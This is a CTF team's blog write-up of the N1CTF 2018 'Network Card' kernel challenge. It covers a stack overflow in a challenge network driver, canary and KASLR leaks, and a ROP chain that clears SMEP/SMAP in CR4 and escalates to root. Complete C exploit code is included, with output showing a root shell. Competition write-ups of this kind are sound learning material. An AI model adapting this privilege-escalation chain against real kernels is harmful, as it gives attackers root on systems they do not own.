

  
    
  


  





  

<!DOCTYPE html>
<html lang="en-us">
  <head>
    
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="generator" content="Hugo 0.46 with theme Tranquilpeak 0.4.3-BETA">
    <title>N1CTF 2018 Network Card Writeup</title>
    <meta name="author" content="Team-Eur3kA">
    <meta name="keywords" content="N1CTF, N1CTF-2018, writeup">

    <link rel="icon" href="https://Team-Eur3kA.github.io/favicon.png">
    

    
    <meta name="description" content="Hi, I&rsquo;m Ne0. Last weekend we Eur3kA played Nu1L CTF 2018 and won the champion. Thanks all my strong teammates. This kernel pwn challenge is not very difficult but kind of tricky. Thanks @Anciety&rsquo;s help.
Challenge info The challenge files includes the following:
➜ network_card ls bzImage initramfs.img nu1l.ko startvm.sh  Obviously we should focus on nu1l.ko. Take a look at the startvm.sh and we will find that we have to bypass kaslr,smep and smap to solve this challenge.">
    <meta property="og:description" content="Hi, I&rsquo;m Ne0. Last weekend we Eur3kA played Nu1L CTF 2018 and won the champion. Thanks all my strong teammates. This kernel pwn challenge is not very difficult but kind of tricky. Thanks @Anciety&rsquo;s help.
Challenge info The challenge files includes the following:
➜ network_card ls bzImage initramfs.img nu1l.ko startvm.sh  Obviously we should focus on nu1l.ko. Take a look at the startvm.sh and we will find that we have to bypass kaslr,smep and smap to solve this challenge.">
    <meta property="og:type" content="blog">
    <meta property="og:title" content="N1CTF 2018 Network Card Writeup">
    <meta property="og:url" content="/2018/03/n1ctf-2018-network-card-writeup/">
    <meta property="og:site_name" content="Team-Eur3kA Blog">
    <meta name="twitter:card" content="summary">
    <meta name="twitter:title" content="Team-Eur3kA Blog">
    <meta name="twitter:description" content="Hi, I&rsquo;m Ne0. Last weekend we Eur3kA played Nu1L CTF 2018 and won the champion. Thanks all my strong teammates. This kernel pwn challenge is not very difficult but kind of tricky. Thanks @Anciety&rsquo;s help.
Challenge info The challenge files includes the following:
➜ network_card ls bzImage initramfs.img nu1l.ko startvm.sh  Obviously we should focus on nu1l.ko. Take a look at the startvm.sh and we will find that we have to bypass kaslr,smep and smap to solve this challenge.">
    
    

    
    

    
      <meta property="og:image" content="https://farscapedevelopment.files.wordpress.com/2012/07/eureka.gif">
    

    
    
    

    

    
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css" integrity="sha256-eZrrJcwDc/3uDhsdt61sL2oOBY362qM3lon1gyExkL0=" crossorigin="anonymous" />
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/2.1.4/jquery.fancybox.min.css" integrity="sha256-vuXZ9LGmmwtjqFX1F+EKin1ThZMub58gKULUyf0qECk=" crossorigin="anonymous" />
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/2.1.4/helpers/jquery.fancybox-thumbs.min.css" integrity="sha256-SEa4XYAHihTcEP1f5gARTB2K26Uk8PsndQYHQC1f4jU=" crossorigin="anonymous" />
    
    
    <link rel="stylesheet" href="https://Team-Eur3kA.github.io/css/style-jsjn0006wyhpyzivf6yceb31gvpjatbcs3qzjvlumobfnugccvobqwxnnaj8.min.css" />
    
    

    
      
    
    
  </head>

  <body>
    <div id="blog">
      <header id="header" data-behavior="4">
  <i id="btn-open-sidebar" class="fa fa-lg fa-bars"></i>
  <div class="header-title">
    <a class="header-title-link" href="https://Team-Eur3kA.github.io/">Team-Eur3kA Blog</a>
  </div>
  
    
      <a class="header-right-picture "
         href="https://Team-Eur3kA.github.io/#about">
    
    
    
      
        <img class="header-picture" src="https://farscapedevelopment.files.wordpress.com/2012/07/eureka.gif" alt="Author&#39;s picture" />
      
    
    </a>
  
</header>

      <nav id="sidebar" data-behavior="4">
  <div class="sidebar-container">
    
      <div class="sidebar-profile">
        <a href="https://Team-Eur3kA.github.io/#about">
          <img class="sidebar-profile-picture" src="https://farscapedevelopment.files.wordpress.com/2012/07/eureka.gif" alt="Author&#39;s picture" />
        </a>
        <h4 class="sidebar-profile-name">Team-Eur3kA</h4>
        
          <h5 class="sidebar-profile-bio">CTF Security Team Eur3kA deriving from former united team FFF-PKyou which consists of members from multiple united team FFF and Peking University team PKyou</h5>
        
      </div>
    
    <ul class="sidebar-buttons">
      
  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://Team-Eur3kA.github.io/">
    
      <i class="sidebar-button-icon fa fa-lg fa-home"></i>
      
      <span class="sidebar-button-desc">Home</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://Team-Eur3kA.github.io/categories">
    
      <i class="sidebar-button-icon fa fa-lg fa-bookmark"></i>
      
      <span class="sidebar-button-desc">Categories</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://Team-Eur3kA.github.io/tags">
    
      <i class="sidebar-button-icon fa fa-lg fa-tags"></i>
      
      <span class="sidebar-button-desc">Tags</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://Team-Eur3kA.github.io/archives">
    
      <i class="sidebar-button-icon fa fa-lg fa-archive"></i>
      
      <span class="sidebar-button-desc">Archives</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://Team-Eur3kA.github.io/#about">
    
      <i class="sidebar-button-icon fa fa-lg fa-question"></i>
      
      <span class="sidebar-button-desc">About</span>
    </a>
  </li>


    </ul>
    <ul class="sidebar-buttons">
      
  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://github.com/Team-Eur3kA" target="_blank" rel="noopener">
    
      <i class="sidebar-button-icon fa fa-lg fa-github"></i>
      
      <span class="sidebar-button-desc">GitHub</span>
    </a>
  </li>


    </ul>
    <ul class="sidebar-buttons">
      
  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://Team-Eur3kA.github.io/index.xml">
    
      <i class="sidebar-button-icon fa fa-lg fa-rss"></i>
      
      <span class="sidebar-button-desc">RSS</span>
    </a>
  </li>


    </ul>
  </div>
</nav>

      

      <div id="main" data-behavior="4"
        class="
               hasCoverMetaIn
               ">
        <article class="post" itemscope itemType="http://schema.org/BlogPosting">
          
          
            <div class="post-header main-content-wrap text-left">
  
    <h1 class="post-title" itemprop="headline">
      N1CTF 2018 Network Card Writeup
    </h1>
  
  
  <div class="postShorten-meta post-meta">
    
      <time itemprop="datePublished" datetime="2018-03-13T00:00:00Z">
        
  March 13, 2018

      </time>
    
    
  
  
    <span>in</span>
    
      <a class="category-link" href="https://Team-Eur3kA.github.io/categories/n1ctf">N1CTF</a>, 
    
      <a class="category-link" href="https://Team-Eur3kA.github.io/categories/n1ctf-2018">N1CTF-2018</a>, 
    
      <a class="category-link" href="https://Team-Eur3kA.github.io/categories/writeup">writeup</a>
    
  

  </div>

</div>
          
          <div class="post-content markdown" itemprop="articleBody">
            <div class="main-content-wrap">
              

<p>Hi, I&rsquo;m <a href="https://github.com/Changochen">Ne0</a>. Last weekend we Eur3kA played Nu1L CTF 2018 and won the champion. Thanks all my strong teammates. This kernel pwn challenge is not very difficult but kind of tricky. Thanks <a href="https://github.com/Escapingbug">@Anciety&rsquo;s</a> help.</p>

<h2 id="challenge-info">Challenge info</h2>

<p>The challenge files includes the following:</p>

<pre><code class="language-bash">➜  network_card ls
bzImage  initramfs.img  nu1l.ko  startvm.sh
</code></pre>

<p>Obviously we should focus on <code>nu1l.ko</code>. Take a look at the <code>startvm.sh</code> and we will find that we have to bypass kaslr,smep and smap to solve this challenge.</p>

<h2 id="the-driver">The driver</h2>

<p>Load the driver into IDA, we find the logic is surprisingly simple. But to completely understand it, we need to repair the struct info. And this was done by Anciety.</p>

<p>This is a network driver. And all it provides is the function to forward packet from interface <code>null</code>&rsquo;s broadcast to localhost:1337. Details can be found in sub_0:</p>

<pre><code class="language-cpp">__int64 __usercall do_send@&lt;rax&gt;(int size@&lt;edi&gt;, struct Packet *data@&lt;rsi&gt;, unsigned __int16 input_size@&lt;r13w&gt;, int a4@&lt;r14d&gt;)
{
    /* some variable */
    char buf[256]; 
    u64 canary;

    if ( !v4
         || (v6 = data, data-&gt;header[1] != 'u')
         || data-&gt;header[2] != '1'
         || data-&gt;header[3] != 'L'
         || (input_size = __ROL2__(data-&gt;size, 8), a4 = input_size, input_size != size - 0x30)
         || (data = (struct Packet *)SOCK_DGRAM, (signed int)sock_create(2LL, SOCK_DGRAM, 17LL, &amp;sock) &lt; 0) )
    {
        result = 0LL;
        goto LABEL_3;
    }                   /* check header and size */

    v18 = 2;
    port = 0x3905;
    ip = 0x100007F;
    data = (struct Packet *)&amp;v18;
    v7 = sock-&gt;ops-&gt;connect;
    v8 = _x86_indirect_thunk_rax(sock, &amp;v18, 16LL, 0LL); /* connect */

    // some unimportant code

    if ( input_size  )
    {
        index = 0LL;
        do
        {
            c_char = input[index];
            if ( size - 0x31 &gt; (signed int)index &amp;&amp; c_char == 0x13 &amp;&amp; input[index + 1] == 0x37  )
                break;
            buf[index++] = c_char ^ 0x6F;

        }
        while ( input_size &gt; (unsigned __int16)index  );
    } // buffer overflow !!

    // some unimportant code
    v9 = kernel_sendmsg(sock, (struct msghdr *)data, &amp;v15, 1uLL, v16);
    // some unimportant code

}
</code></pre>

<p>The buf is on the stack, and its length is fixed. But the size of our packet can be large than this, which causes kernel stack overflow.
Besides,as the loop checks for 0x1337 as a sign to end, we can set the packet size to be some value like 0x400, and the content is 0x1337.Then we can make it leak 0x400 bytes in the stack without corrupting it. Finally,with the leaked cannary and kernel address, we can send a packet again, only this time we perform a kernel ROP.</p>

<p>By the way, the port above is 0x3905, but when we listened on this port, we received nothing. After wasting some time debugging, we realized that the network endian stuff! So the port should be 0x539,which is 1337.</p>

<h2 id="exploit">Exploit</h2>

<p>With the infomation above, we plan to exploit the kernel with the following steps:
1. Run a server that listens at localhost:1337
2. Run a client that send a packet with large size but only with the content <code>\x13\x37</code>
3. The server receives the leaked infomation. The client manages to read it.
4. Perform kernel ROP.</p>

<p>Kaslr can be easily defeated by leaking. And the SMEP and SMAP can be bypassed by writing CR4 register to be 0x6f0. This can be done by ROP easily.
For more details, please take a look at:
1. <a href="https://changochen.github.io/2018/02/07/sharif8/">Sharif CTF 2018&ndash;KDB writeup</a>,which is written in English
2. <a href="https://www.anquanke.com/post/id/86490">一道简单内核题入门内核利用</a>,which is written in Chinese.</p>

<p>The final exploit:</p>

<p>Server.c:</p>

<pre><code class="language-cpp">#include&lt;stdio.h&gt;
#include&lt;stdlib.h&gt;
#include&lt;unistd.h&gt;
#include&lt;errno.h&gt;
#include&lt;sys/types.h&gt;
#include&lt;sys/socket.h&gt;
#include&lt;netinet/in.h&gt;
#include&lt;string.h&gt;
#include&lt;fcntl.h&gt;

#define serverlen 0x10000

#define ERR_EXIT(m) \
    do { \
        perror(m); \
        exit(EXIT_FAILURE); \
    } while (0)

void echo_ser(int sock)
{
    char recvbuf[serverlen] = {0};
    memset(recvbuf,0,serverlen);
    struct sockaddr_in peeraddr;
    socklen_t peerlen;
    int n;

    system(&quot;touch /tmp/res&quot;);
    int fd=open(&quot;/tmp/res&quot;,O_RDWR);
    while (1)
    {

        peerlen = sizeof(peeraddr);
        memset(recvbuf, 0, sizeof(recvbuf));
        n = recvfrom(sock, recvbuf, sizeof(recvbuf), 0,
                     (struct sockaddr *)&amp;peeraddr, &amp;peerlen);
        if (n &lt;= 0)
        {

            if (errno == EINTR)
                continue;

            ERR_EXIT(&quot;recvfrom error&quot;);
        }
        else if(n &gt; 0)
        {
            unsigned long* ptr=recvbuf+6;
            int i;
            printf(&quot;Received data：%s\n,length:%d\nFrom %s:%d\n&quot;,recvbuf,n,inet_ntoa(peeraddr.sin_addr),peeraddr.sin_port);
            for(i=0;i&lt;(n-8)/8;i++){
                if(i%4==0)
                    printf(&quot;\n%d-%d:&quot;,i,i+3);
                printf(&quot;%lx &quot;,ptr[i]);
            }
            write(fd,&amp;ptr[42],8);
            write(fd,&amp;ptr[32],8);
            close(fd);
            return ;
        }
    }
    close(sock);
}

int main(int argc,char** argv)
{
    setvbuf(stdout,0,2,0);
    int sock;
    if ((sock = socket(AF_INET, SOCK_DGRAM, 0)) &lt; 0)
        ERR_EXIT(&quot;socket error&quot;);

    int port=10000;
    struct sockaddr_in servaddr;
    memset(&amp;servaddr, 0, sizeof(servaddr));
    servaddr.sin_family = AF_INET;
    servaddr.sin_addr.s_addr = inet_addr(&quot;127.0.0.1&quot;);


    servaddr.sin_port = htons(1337);
    if (bind(sock, (struct sockaddr *)&amp;servaddr, sizeof(servaddr)) &lt; 0){
        ERR_EXIT(&quot;bind error&quot;);
    }

    echo_ser(sock);

    return 0;
}

</code></pre>

<p>Client.c</p>

<pre><code class="language-cpp">#include &lt;sys/types.h&gt;
#include &lt;sys/socket.h&gt;
#include &lt;netinet/in.h&gt;
#include &lt;netdb.h&gt;
#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;string.h&gt;
#include &lt;strings.h&gt;
#include &lt;arpa/inet.h&gt;
#include &lt;unistd.h&gt;
#include &lt;errno.h&gt;
#include &lt;fcntl.h&gt;

struct Packet{
    char header[4];
    unsigned short size;
    char buffer[0x10000];
};

typedef int __attribute__((regparm(3))) (*_commit_creds)(unsigned long cred);
typedef int __attribute__((regparm(3))) (*_msleep)(unsigned long second);
typedef unsigned long __attribute__((regparm(3))) (*_prepare_kernel_cred)(unsigned long cred);

char buf[0x30000];

_msleep msleep;
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
unsigned long native_write_cr4;
unsigned long poprdi;
unsigned long user_cs, user_ss, user_rflags;

static void save_state()
{
    asm(
        &quot;movq %%cs, %0\n&quot;
        &quot;movq %%ss, %1\n&quot;
        &quot;pushfq\n&quot;
        &quot;popq %2\n&quot;
        : &quot;=r&quot;(user_cs), &quot;=r&quot;(user_ss), &quot;=r&quot;(user_rflags)
        :
        : &quot;memory&quot;);
}


void get_shell()
{
    if(getuid()!=0){
        puts(&quot;Get root failed!!!&quot;);
        exit(0);

    }
    printf(&quot;Enjoy your root shell:)\n&quot;);
    system(&quot;/bin/sh&quot;);
}

static void shellcode()
{
    commit_creds(prepare_kernel_cred(0));

    msleep(1000);
    asm(
        &quot;swapgs\n&quot;
        &quot;movq %0,%%rax\n&quot;    // push things into stack for iretq
        &quot;pushq %%rax\n&quot;
        &quot;movq %1,%%rax\n&quot;
        &quot;pushq %%rax\n&quot;
        &quot;movq %2,%%rax\n&quot;
        &quot;pushq %%rax\n&quot;
        &quot;movq %3,%%rax\n&quot;
        &quot;pushq %%rax\n&quot;
        &quot;movq %4,%%rax\n&quot;
        &quot;pushq %%rax\n&quot;
        &quot;iretq\n&quot;
        :
        :&quot;r&quot;(user_ss),&quot;r&quot;(buf+0x20000),&quot;r&quot;(user_rflags),&quot;r&quot;(user_cs),&quot;r&quot;(get_shell)
        :&quot;memory&quot;
       );
}

int main() {
    system(&quot;./server &gt;/tmp/tt&amp;&quot;);
    int sock = socket(AF_INET, SOCK_DGRAM, 0);

    struct Packet packet;
    int bufferlen;
    bufferlen=0x400;

LOOP:
    memcpy(packet.header,&quot;Nu1L&quot;,4);
    memset(packet.buffer,0,bufferlen);
    memcpy(packet.buffer,&quot;\x13\x37&quot;,2);

    packet.size=bufferlen&gt;&gt;8;

    struct sockaddr_in serv_addr;

    int broadcast_enable = 1;
    if (setsockopt(sock, SOL_SOCKET, SO_BROADCAST, &amp;broadcast_enable, sizeof(broadcast_enable)) &lt; 0) {
        perror(&quot;setsockopt&quot;);
        exit(-1);
    }

    bzero((char*) &amp;serv_addr, sizeof(serv_addr));
    serv_addr.sin_family = AF_INET;
    serv_addr.sin_port = htons(12345);
    serv_addr.sin_addr.s_addr = inet_addr(&quot;6.6.6.255&quot;);
    if (sendto(sock,&amp;packet, bufferlen+6, 0, (struct sockaddr *)&amp;serv_addr, sizeof(serv_addr)) &lt; 0) {
        perror(&quot;sendto&quot;);
    }
    unsigned long canary,kernelbase;
    int fd;
    sleep(1);
    fd=open(&quot;/tmp/res&quot;,O_RDWR);
    if(fd==-1){
        printf(&quot;Open failed!\n&quot;);
        exit(0);
    }
    read(fd,&amp;kernelbase,8);
    read(fd,&amp;canary,8);
    close(fd);

    if(canary==0)
        goto LOOP;

    unsigned long* ptr=packet.buffer+0x100;
    prepare_kernel_cred=kernelbase-7649710;
    commit_creds=prepare_kernel_cred-976;
    unsigned long static_pre=0xffffffff8107d3a0;
    native_write_cr4=prepare_kernel_cred-static_pre+0xffffffff8104d9ad;
    poprdi=prepare_kernel_cred-static_pre+0xffffffff8124c735;
    msleep=prepare_kernel_cred-0xffffffffab87d3a0+0xffffffffab8c7eb0;

    printf(&quot;Canary :%lx\nKernelbase %lx\nCommit_creds:%lx\n&quot;,canary,kernelbase,commit_creds);

    ptr[0]=canary^0x6F6F6F6F6F6F6F6F;
    save_state();
    printf(&quot;Eflags %lx,SS %lx, CS %lx\n&quot;,user_rflags,user_ss,user_cs);
    unsigned long payload[]={
        (unsigned long)buf+0x10000,
        poprdi,
        0x6f0,
        (unsigned long)buf+0x10000,
        native_write_cr4,
        (unsigned long)buf+0x10000,
        (unsigned long)shellcode,
    };
    for(int i=0;i&lt;sizeof(payload)/8;i++){
        ptr[5+i]=payload[i]^0x6F6F6F6F6F6F6F6F;
    }

    memset(packet.buffer,0,0x100);
    memcpy(packet.buffer+0x100+5*8+sizeof(payload),&quot;\x13\x37&quot;,2);
    if (sendto(sock,&amp;packet, bufferlen+6, 0, (struct sockaddr *)&amp;serv_addr, sizeof(serv_addr)) &lt; 0) {
        perror(&quot;sendto&quot;);
    }
    return 0;
}
</code></pre>

<p>When I was solving this challenge, I found that the kernel crashed just after <code>iretq</code>. And the error infomation mentions something about scheduling. I don&rsquo;t know whether it is because the buffer overflow corrupts some data for scheduling. And the exploit is very unstable because of it. Then during debuggin I found that if the kernel performs scheduling before <code>iretq</code>, then the <code>iretq</code> is sure to succeed. I have no time to further debug it at the moment, but if any of you have any idea,please share it with <a href="changochen1@gmail.com">me</a>:)</p>

<p>With all this,we have the following:</p>

<pre><code class="language-bash">__        __   _                            _        
\ \      / /__| | ___ ___  _ __ ___   ___  | |_ ___  
 \ \ /\ / / _ \ |/ __/ _ \| '_ ` _ \ / _ \ | __/ _ \ 
  \ V  V /  __/ | (_| (_) | | | | | |  __/ | || (_) |
   \_/\_/ \___|_|\___\___/|_| |_| |_|\___|  \__\___/ 
                                                     
 _   _ _  ____ _____ _____ 
| \ | / |/ ___|_   _|  ___|
|  \| | | |     | | | |_   
| |\  | | |___  | | |  _|  
|_| \_|_|\____| |_| |_|    

/ $ id
uid=1000(pwn) gid=1000 groups=1000
/ $ ./client
Canary :a5331ce835ea8f00
Kernelbase ffffffff92dc8d4e
Commit_creds:ffffffff9267cfd0
Eflags 202,SS 2b, CS 33
/ # id
uid=0(root) gid=0
/ # 
</code></pre>

<p>Enjoy your root shell:)</p>

              
            </div>
          </div>
          <div id="post-footer" class="post-footer main-content-wrap">
            
              
                
                
                  <div class="post-footer-tags">
                    <span class="text-color-light text-small">TAGGED IN</span><br/>
                    
  <a class="tag tag--primary tag--small" href="https://Team-Eur3kA.github.io/tags/n1ctf/">N1CTF</a>

  <a class="tag tag--primary tag--small" href="https://Team-Eur3kA.github.io/tags/n1ctf-2018/">N1CTF-2018</a>

  <a class="tag tag--primary tag--small" href="https://Team-Eur3kA.github.io/tags/writeup/">writeup</a>

                  </div>
                
              
            
            
  <div class="post-actions-wrap">
      <nav >
        <ul class="post-actions post-action-nav">
          
            <li class="post-action">
              
                <a class="post-action-btn btn btn--default tooltip--top" href="https://Team-Eur3kA.github.io/2018/09/twctf-2018-rkm-readablekernelmodule-writeup/" data-tooltip="TWCTF-2018 RKM (ReadableKernelModule) writeup">
              
                  <i class="fa fa-angle-left"></i>
                  <span class="hide-xs hide-sm text-small icon-ml">NEXT</span>
                </a>
            </li>
            <li class="post-action">
              
                <a class="post-action-btn btn btn--default tooltip--top" href="https://Team-Eur3kA.github.io/2018/03/n1ctf-2018-memsafety-writeup/" data-tooltip="N1CTF-2018 memsafety Writeup">
              
                  <span class="hide-xs hide-sm text-small icon-mr">PREVIOUS</span>
                  <i class="fa fa-angle-right"></i>
                </a>
            </li>
          
        </ul>
      </nav>
    <ul class="post-actions post-action-share" >
      
        <li class="post-action hide-lg hide-md hide-sm">
          <a class="post-action-btn btn btn--default btn-open-shareoptions" href="#btn-open-shareoptions">
            <i class="fa fa-share-alt"></i>
          </a>
        </li>
        
      
      
      <li class="post-action">
        
          <a class="post-action-btn btn btn--default" href="#">
        
          <i class="fa fa-list"></i>
        </a>
      </li>
    </ul>
  </div>


            
              
            
          </div>
        </article>
        <footer id="footer" class="main-content-wrap">
  <span class="copyrights">
    &copy; 2018 Team-Eur3kA. All Rights Reserved
  </span>
</footer>

      </div>
      <div id="bottom-bar" class="post-bottom-bar" data-behavior="4">
        
  <div class="post-actions-wrap">
      <nav >
        <ul class="post-actions post-action-nav">
          
            <li class="post-action">
              
                <a class="post-action-btn btn btn--default tooltip--top" href="https://Team-Eur3kA.github.io/2018/09/twctf-2018-rkm-readablekernelmodule-writeup/" data-tooltip="TWCTF-2018 RKM (ReadableKernelModule) writeup">
              
                  <i class="fa fa-angle-left"></i>
                  <span class="hide-xs hide-sm text-small icon-ml">NEXT</span>
                </a>
            </li>
            <li class="post-action">
              
                <a class="post-action-btn btn btn--default tooltip--top" href="https://Team-Eur3kA.github.io/2018/03/n1ctf-2018-memsafety-writeup/" data-tooltip="N1CTF-2018 memsafety Writeup">
              
                  <span class="hide-xs hide-sm text-small icon-mr">PREVIOUS</span>
                  <i class="fa fa-angle-right"></i>
                </a>
            </li>
          
        </ul>
      </nav>
    <ul class="post-actions post-action-share" >
      
        <li class="post-action hide-lg hide-md hide-sm">
          <a class="post-action-btn btn btn--default btn-open-shareoptions" href="#btn-open-shareoptions">
            <i class="fa fa-share-alt"></i>
          </a>
        </li>
        
      
      
      <li class="post-action">
        
          <a class="post-action-btn btn btn--default" href="#">
        
          <i class="fa fa-list"></i>
        </a>
      </li>
    </ul>
  </div>


      </div>
      <div id="share-options-bar" class="share-options-bar" data-behavior="4">
  <i id="btn-close-shareoptions" class="fa fa-close"></i>
  <ul class="share-options">
    
  </ul>
</div>
<div id="share-options-mask" class="share-options-mask"></div>
    </div>
    
    <div id="about">
  <div id="about-card">
    <div id="about-btn-close">
      <i class="fa fa-remove"></i>
    </div>
    
      <img id="about-card-picture" src="https://farscapedevelopment.files.wordpress.com/2012/07/eureka.gif" alt="Author&#39;s picture" />
    
    <h4 id="about-card-name">Team-Eur3kA</h4>
    
      <div id="about-card-bio">CTF Security Team Eur3kA deriving from former united team FFF-PKyou which consists of members from multiple united team FFF and Peking University team PKyou</div>
    
    
      <div id="about-card-job">
        <i class="fa fa-briefcase"></i>
        <br/>
        Security Team
      </div>
    
    
      <div id="about-card-location">
        <i class="fa fa-map-marker"></i>
        <br/>
        China
      </div>
    
  </div>
</div>

    <div id="algolia-search-modal" class="modal-container">
  <div class="modal">
    <div class="modal-header">
      <span class="close-button"><i class="fa fa-close"></i></span>
      <a href="https://algolia.com" target="_blank" rel="noopener" class="searchby-algolia text-color-light link-unstyled">
        <span class="searchby-algolia-text text-color-light text-small">by</span>
        <img class="searchby-algolia-logo" src="https://www.algolia.com/static_assets/images/press/downloads/algolia-light.svg">
      </a>
      <i class="search-icon fa fa-search"></i>
      <form id="algolia-search-form">
        <input type="text" id="algolia-search-input" name="search"
          class="form-control input--large search-input" placeholder="Search" />
      </form>
    </div>
    <div class="modal-body">
      <div class="no-result text-color-light text-center">no post found</div>
      <div class="results">
        
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://Team-Eur3kA.github.io/2018/09/twctf-2018-rkm-readablekernelmodule-writeup/">
                <h3 class="media-heading">TWCTF-2018 RKM (ReadableKernelModule) writeup</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
                  Sep 9, 2018
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather"><p></p></div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://Team-Eur3kA.github.io/2018/03/n1ctf-2018-network-card-writeup/">
                <h3 class="media-heading">N1CTF 2018 Network Card Writeup</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
                  Mar 3, 2018
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather">Hi, I&rsquo;m Ne0. Last weekend we Eur3kA played Nu1L CTF 2018 and won the champion. Thanks all my strong teammates. This kernel pwn challenge is not very difficult but kind of tricky. Thanks @Anciety&rsquo;s help.
Challenge info The challenge files includes the following:
➜ network_card ls bzImage initramfs.img nu1l.ko startvm.sh  Obviously we should focus on nu1l.ko. Take a look at the startvm.sh and we will find that we have to bypass kaslr,smep and smap to solve this challenge.</div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://Team-Eur3kA.github.io/2018/03/n1ctf-2018-memsafety-writeup/">
                <h3 class="media-heading">N1CTF-2018 memsafety Writeup</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
                  Mar 3, 2018
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather"><p></p></div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://Team-Eur3kA.github.io/2018/02/codegate-2018-7amebox1-writeup/">
                <h3 class="media-heading">CodeGate 2018 7amebox1 Writeup</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
                  Feb 2, 2018
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather"><p></p></div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://Team-Eur3kA.github.io/2018/02/codegate-2018-web-writeup/">
                <h3 class="media-heading">CodeGate 2018 Web Writeup</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
                  Feb 2, 2018
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather"><p></p></div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://Team-Eur3kA.github.io/2018/02/welcome-to-team-eur3ka-site/">
                <h3 class="media-heading">Welcome to Team Eur3kA site</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
                  Feb 2, 2018
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather"><p>Welcome a lot to visit Team Eur3kA offitial site.
</p></div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
      </div>
    </div>
    <div class="modal-footer">
      <p class="results-count text-medium"
         data-message-zero="no post found"
         data-message-one="1 post found"
         data-message-other="{n} posts found">
         6 posts found
      </p>
    </div>
  </div>
</div>
    
  
    
    <div id="cover" style="background-image:url('https://Team-Eur3kA.github.io/images/cover.jpg');"></div>
  


    
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js" integrity="sha256-BbhdlvQf/xTY9gja0Dq3HiwQF8LaCRTXxZKRutelT44=" crossorigin="anonymous"></script>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/9.12.0/highlight.min.js" integrity="sha256-/BfiIkHlHoVihZdc6TFuj7MmJ0TWcWsMXkeDFwhi0zw=" crossorigin="anonymous"></script>

<script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/2.1.7/js/jquery.fancybox.min.js" integrity="sha256-GEAnjcTqVP+vBp3SSc8bEDQqvWAZMiHyUSIorrWwH50=" crossorigin="anonymous"></script>


<script src="https://Team-Eur3kA.github.io/js/script-qi9wbxp2ya2j6p7wx1i6tgavftewndznf4v0hy2gvivk1rxgc3lm7njqb6bz.min.js"></script>



<script>
$(document).ready(function() {
  hljs.configure({ classPrefix: '', useBR: false });
  $('pre.code-highlight > code, pre > code').each(function(i, block) {
    if (!$(this).hasClass('codeblock')) {
      $(this).addClass('codeblock');
    }
    hljs.highlightBlock(block);
  });
});
</script>


  
    
  



    
  </body>
</html>

